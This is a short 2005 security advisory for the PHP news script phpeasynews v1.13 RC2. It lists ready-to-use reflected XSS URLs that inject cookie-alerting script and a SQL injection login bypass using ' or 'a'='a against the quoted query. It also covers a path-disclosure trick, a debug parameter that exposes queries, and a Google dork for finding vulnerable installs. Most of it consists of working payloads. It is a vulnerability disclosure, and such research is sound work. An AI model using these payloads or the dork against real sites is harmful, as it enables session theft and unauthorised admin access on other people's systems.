31/07/2005 0.17.53

phpeasynews v1.13 RC2 (possibly prior versions)
cross site scripting, path disclosure , user check bypass  

author site:
http://www.brettjenkins.co.uk/

xss:

http://[target]/[path]/includes/css.php?css_tableheader=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_tablemain=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_na_writtenbyonat=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/css.php?css_hyperlink_hover=}--></style><script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_version_number=<script>alert(document.cookie)</script><!--
http://[target]/[path]/includes/footer.php?pen_website_url=<script>alert(document.cookie)</script><!--


path disclosure:

you can try to login with ' char to see full path of the application


user check bypass (sql injection):

if magic_quotes are off, you can always login with username: ' or 'a'='a
(at line 114, we have:
$query = "SELECT * FROM $PEN_DB_TABLE3 WHERE username = '$submittedusername'";
that become:
SELECT * FROM pen_users WHERE username = '' or 'a'='a'
always true...)
however you can not do the same with password, actually
so, one of the admin users, if created, can login as an invisibile user
named "'or 'a'='a"
or "'or isnull(1/0) or 'a'='a"
etc.

debug mode:

you can always see queries content calling $debug variabile, example:
http://[target]/[path]/admin.php?debug=1


googledork:

"Powered By: PHPeasynews" 

author has been contacted

rgod
email: retrogod at aliceposta it
site: http://rgod.altervista.org